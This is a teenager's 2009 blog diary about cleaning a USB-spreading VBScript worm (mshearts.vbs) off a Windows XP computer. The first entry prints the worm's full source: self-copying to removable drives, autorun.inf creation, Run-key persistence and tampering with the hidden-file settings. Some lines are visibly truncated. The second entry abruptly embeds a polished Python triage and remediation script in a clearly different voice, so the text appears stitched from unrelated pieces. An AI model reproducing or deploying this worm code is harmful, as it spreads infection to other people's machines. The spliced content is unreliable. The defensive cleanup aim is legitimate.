The angel come for me, call me from the sadness and the other story of Virus.

on Tuesday, 31 March 2009

I think tonight is the best night of this week. Hihi... do you want to know why? Because she wants to chat with me. Just with me, and she wrote this somewhere. Oh.. but sorry, I don't want to tell you, and you wouldn't care anyway.

Besides that, I ran into trouble. My computer, running Windows XP, was infected by msheart.vbs because of my friend. He borrowed my flash disk and opened it by double-clicking. The virus took over my computer because he opened it under my Admin account. The registry was damaged, and the folder settings could no longer show hidden files, hefff..

At first I thought I would have to reinstall my OS, but I was too lazy to find my Windows XP SP2 Pirate Edition *not the original one :P*.

First, I tried a scan with AVG Internet Security *again not the original one*, because I am just a high school student and don't have enough money to buy the license. Hehe...

But it wasn't effective. AVG Internet Security didn't find anything on my flash disk or in My Computer. I was disappointed, because I had reported this virus to AVG a month ago.

After that, I uninstalled AVG and tried to use my batch file programming skills. This time I felt lucky, because the virus hadn't disabled CMD (the Command Prompt). Huff... I started working in CMD, but I couldn't concentrate because I was so happy after chatting with "her" and telling some jokes. Hehe..

I tried this:

ATTRIB -H -R -S %1\*.* /S /D

I saved it in a batch file. It strips the hidden, read-only and system attributes from every file under the drive given as %1, so hidden and "super hidden" (system + hidden) files become normal files again. Yuuuhuuu.. the virus showed itself and I could see autorun.inf on my C:, D: and E:. YAAA ~ HAAA.....

I searched for it with the Windows Search tool and found it in "C:\WINDOWS\system32\dllcache". The file name is ".vbe". First, I saved it into a text document to analyze it.

This is the body of the virus:

on error resume next
dim mylove,wincrak,Usbdrive,Naruto,mf,sex,tf,egp,nt,check,sd,Drive,Root,fname,pic 
sex = "By`DEWI"&vbcrlf&"[autorun]"&vbcrlf&"systemID=rmhrvhgt.exe"&vbcrlf&"open=wscript.exe .\mshearts.vbs"&vbcrlf&"shell\open=open"&vbcrlf&"shell\open\Command=wscript.exe .\mshearts.vbs"&vbcrlf&"shell\open\Default=1"&vbcrlf&"shell\explore=explore"&vbcrlf&"shell\explore\Command=wscript.exe .\mshearts.vbs"
set Naruto = createobject("Scripting.FileSystemObject")
set mf = Naruto.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mylove=mylove&text.readline
mylove=mylove & vbcrlf
loop
Drive =
Set Root = CreateObject("Scripting.FileSystemObject"). _
GetDrive(Drive).RootFolder
Set fname = New RegExp
With fname
.Pattern = "
.IgnoreCase = True
.Global = False
.Multiline = False
End With
Call Rename(Root, fname)
Sub Rename(Folder, RegExp)
Dim SubFolder, File
For Each File in Folder.Files
If RegExp.Test(File.Name) Then
File.Name = RegExp.Replace(File.Name, ".exe")'‚g‚r‚o
End If
Next
For Each SubFolder In Folder.SubFolders
Call Rename(SubFolder, RegExp)
Next
end sub
do
Set wincrak = Naruto.getspecialfolder(0)
set tf = Naruto.getfile(wincrak & "\system32\dllcache\.vbe")
tf.attributes = 32
set tf=Naruto.createtextfile(wincrak & "\system32\dllcache\.vbe",2,true)
tf.write mylove
tf.close
set tf = Naruto.getfile(wincrak & "\system32\dllcache\.vbe")
tf.attributes = 39
for each Usbdrive in Naruto.drives
If (Usbdrive.drivetype = 1 or Usbdrive.drivetype = 2) and Usbdrive.path <> "A:" then
set tf=Naruto.createtextfile("c:\Documents and Settings\All Users\Desktop\I'M here.htm",2,true)
tf.write pic
tf.close
set tf=Naruto.getfile("e:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("e:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("e:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("e:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("e:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("e:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("f:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("f:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("f:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("f:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("f:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("f:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("g:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("g:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("g:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("g:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("g:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("g:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("h:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("h:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("h:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("h:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("h:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("h:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("i:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("i:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("i:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("i:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("i:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("i:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("j:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("j:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("j:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("j:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("j:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("j:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("k:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("k:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("k:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("k:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("k:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("k:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("l:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("l:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("l:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("l:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("l:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("l:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("m:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("m:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("m:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("m:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("m:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("m:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("n:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("n:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("n:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("n:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("n:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("n:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("o:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("o:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("o:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("o:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("o:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("o:\autorun.inf")
tf.attributes=39
end if
next
set tf = CreateObject("WScript.Shell")
ss = "HKCR\.abg\"
dv2 ="REG_SZ"
tf.Regwrite ss & "" ,"abgfile",dv2
set tf = CreateObject("WScript.Shell")
ss = "HKCR\abgfile\"
dv2 ="REG_SZ"
tf.Regwrite ss & "" ,"Application",dv2
set tf = CreateObject("WScript.Shell")
ss = "HKCR\abgfile\"
dv2 ="REG_SZ"
tf.Regwrite ss & "NeverShowExt" ,"",dv2
set teror = CreateObject("WScript.Shell")
ss = "HKCR\abgfile\"
dv2 ="REG_SZ"
teror.Regwrite ss & "IsShortcut" ,"",dv2
set tf = CreateObject("WScript.Shell")
ss = "HKCR\abgfile\DefaultIcon\"
dv2 ="REG_EXPAND_SZ"
tf.Regwrite ss & "" ,"%SystemRoot%\system32\SHELL32.dll,3",dv2
set tf = CreateObject("WScript.Shell")
ss = "HKCR\abgfile\shell\open\command\"
dv2 ="REG_SZ"
tf.Regwrite ss & "" ,"winhlp32.exe %1",dv2
set egp = CreateObject("WScript.Shell")
ss = "HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\"
dv2 ="REG_SZ"
egp.Regwrite ss & "load" ,"c:\windows\system32\dllcache\.vbe",dv2
set egp = CreateObject("WScript.Shell")
ss = "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\"
dv2 ="REG_DWORD"
egp.Regwrite ss & "CheckedValue" ,"0",dv2
set egp = CreateObject("WScript.Shell")
ss = "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\"
dv2 ="REG_DWORD"
egp.Regwrite ss & "DefaultValue" ,"2",dv2
set egp = CreateObject("WScript.Shell")
ss = "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\NOHIDDEN\SHOWALL\"
dv2 ="REG_DWORD"
egp.Regwrite ss & "CheckedValue" ,"2",dv2
set egp = CreateObject("WScript.Shell")
ss = "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\NOHIDDEN\SHOWALL\"
dv2 ="REG_SZ"
egp.Regwrite ss & "DefaultValue" ,"2",dv2
set egp = CreateObject("WScript.Shell")
ss = "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"
dv2 ="REG_DWORD"
egp.Regwrite ss & "Hidden" ,"0",dv2
set egp = CreateObject("WScript.Shell")
ss = "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"
dv2 ="REG_DWORD"
egp.Regwrite ss & "HideFileExt" ,"1",dv2
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run wincrak&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Wowwww.. too long?? Ahh.. I don't think so. This is just a normal VBS virus. Do you know what VBS means? It is Visual Basic Script.
I don't understand the VBS language very well, but I think I can create the antivirus using a batch file or VBS. I'll continue the project tomorrow, though, because I feel sleepy.

Ahh.. I hope I will dream of "her" in my sleep tonight.

My Journal in 31st March 2009


==================================================================

Second Day....

Today I finally finished my VBScript to delete the msheart.vbs virus from My Computer; you can trace back the virus's location and fix your registry yourself. If I have time, I will upload my VBScript for deleting the msheart.vbs virus.
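Before writing a remover like the one described here, a practitioner would first triage the virus body quoted above: which files it drops, which registry values it writes, and what each write does. The Python script below is an added example and is not the blog author's VBScript. It parses the `Regwrite` and `createtextfile` calls out of a constructed excerpt of the quoted body, labels each registry change (the policy Run persistence, the SHOWALL hidden-files tamper, the `.abg` class registration) and turns them into a remediation checklist, including the files that must be unhidden before deletion because the script sets attributes 39 (archive + system + hidden + read-only). The `SAMPLE_VBS` excerpt, the `CLEAN_VALUES` table of stock Windows XP settings, and the `%SystemRoot%` substitution for the script's `wincrak` variable are assumptions of this example; compare the clean values with a known-good machine before applying them.

```python
"""Static triage of a VBScript dropper such as the mshearts.vbs body quoted above.
Added example (not the blog author's script): it only reads the script text and
never touches the registry or the file system."""
import re
from dataclasses import dataclass

# Constructed excerpt: lines copied from the quoted body, enough to exercise the parser.
SAMPLE_VBS = r'''
on error resume next
set tf=Naruto.createtextfile(wincrak & "\system32\dllcache\.vbe",2,true)
set tf=Naruto.createtextfile("e:\mshearts.vbs",2,true)
set tf=Naruto.createtextfile("e:\autorun.inf",2,true)
set tf = CreateObject("WScript.Shell")
ss = "HKCR\.abg\"
dv2 ="REG_SZ"
tf.Regwrite ss & "" ,"abgfile",dv2
ss = "HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\"
dv2 ="REG_SZ"
egp.Regwrite ss & "load" ,"c:\windows\system32\dllcache\.vbe",dv2
ss = "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\"
dv2 ="REG_DWORD"
egp.Regwrite ss & "CheckedValue" ,"0",dv2
ss = "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"
dv2 ="REG_DWORD"
egp.Regwrite ss & "HideFileExt" ,"1",dv2
'''

@dataclass
class RegWrite:
    key: str    # registry key the script built in its `ss` variable
    name: str   # value name; "" is the key's (Default) value
    data: str
    kind: str   # REG_SZ, REG_DWORD, ...

ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')
REGWRITE_RE = re.compile(
    r'^\s*\w+\.regwrite\s+(\w+)\s*&\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*(\w+)', re.I)
DROP_RE = re.compile(r'createtextfile\(\s*(?:(\w+)\s*&\s*)?"([^"]*)"', re.I)

# In the quoted script `wincrak` holds GetSpecialFolder(0), the Windows folder (assumption).
FOLDER_VARS = {"wincrak": "%SystemRoot%"}

# Stock Windows XP values for the Explorer settings the script overwrites
# (assumed from a clean install; verify against a known-good machine first).
CLEAN_VALUES = {
    ("folder\\hidden\\showall", "checkedvalue"): ("REG_DWORD", "1"),
    ("folder\\hidden\\showall", "defaultvalue"): ("REG_DWORD", "2"),
    ("folder\\nohidden\\showall", "checkedvalue"): ("REG_DWORD", "2"),
    ("folder\\nohidden\\showall", "defaultvalue"): ("REG_DWORD", "2"),
    ("explorer\\advanced", "hidden"): ("REG_DWORD", "1"),       # 1 = show hidden files
    ("explorer\\advanced", "hidefileext"): ("REG_DWORD", "0"),  # 0 = show extensions
}

def parse_script(src):
    """Return (registry writes, dropped file paths) found in the VBS text."""
    env, writes, drops = {}, [], []
    for line in src.splitlines():
        if m := ASSIGN_RE.match(line):          # ss = "..." / dv2 = "..."
            env[m.group(1)] = m.group(2)
        elif m := REGWRITE_RE.match(line):      # x.Regwrite ss & "name", "data", dv2
            keyvar, name, data, kindvar = m.groups()
            writes.append(RegWrite(env.get(keyvar, "?").rstrip("\\"), name,
                                   data, env.get(kindvar, kindvar)))
        elif m := DROP_RE.search(line):         # createtextfile(prefix & "path")
            var, literal = m.groups()
            prefix = FOLDER_VARS.get(var, f"{{{var}}}") if var else ""
            if (path := prefix + literal) not in drops:
                drops.append(path)
    return writes, drops

def classify(w):
    """Label a registry write by the effect it has on the victim machine."""
    k = w.key.lower()
    if "\\policies\\explorer\\run" in k:
        return "persistence: policy Run entry launches the dropped copy at logon"
    if "\\folder\\hidden\\" in k or "\\folder\\nohidden\\" in k:
        return "defence evasion: breaks the Folder Options 'Show hidden files' switch"
    if k.endswith("\\explorer\\advanced") and w.name.lower() in ("hidden", "hidefileext"):
        return "defence evasion: hides files and extensions in the user's Explorer view"
    if k.startswith("hkcr\\"):
        return "file association tampering: registers a new extension or file class"
    return "unclassified"

def remediation_plan(writes, drops):
    """Turn parsed indicators into ordered (action, target, detail) steps."""
    steps = []
    for w in writes:
        k, cat = w.key.lower(), classify(w)
        if cat.startswith("persistence"):
            steps.append(("delete value", f"{w.key}\\{w.name}", None))
        elif k.startswith("hkcr\\"):
            # Remove the whole injected class/extension key, not just one value.
            steps.append(("delete key", "\\".join(w.key.split("\\")[:2]), None))
        else:
            for (suffix, name), clean in CLEAN_VALUES.items():
                if k.endswith(suffix) and w.name.lower() == name:
                    steps.append(("restore value", f"{w.key}\\{w.name}", clean))
    for path in drops:
        # The script sets attributes 39 = archive+system+hidden+read-only, so the
        # attributes must be cleared (attrib -s -h -r) before the file can be deleted.
        steps.append(("remove file", path, "clear S/H/R attributes first"))
    return list(dict.fromkeys(steps))   # keep order, drop duplicates

if __name__ == "__main__":
    found_writes, found_drops = parse_script(SAMPLE_VBS)
    for w in found_writes:
        print(f"{w.kind:10} {w.key}\\{w.name} = {w.data!r}  <- {classify(w)}")
    for step in remediation_plan(found_writes, found_drops):
        print(step)
```

Run it as-is to print the indicators and the plan for the excerpt, or feed `parse_script` the full text of the saved `.vbe` copy. Because it only parses text, the output is a checklist to review and apply by hand (with `reg.exe` and `attrib`), which is the safer shape for a first remover: the registry keys it names come straight from the sample, so nothing is touched that the dropper did not write.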

Haha... because of her, I have the spirit to do that. Hehe... wow.. now it is twenty past ten PM. I'm starting to feel sleepy. But today she wasn't online. I miss her... haha...

See my next post about computer news.

My Journal in 1st April 2009
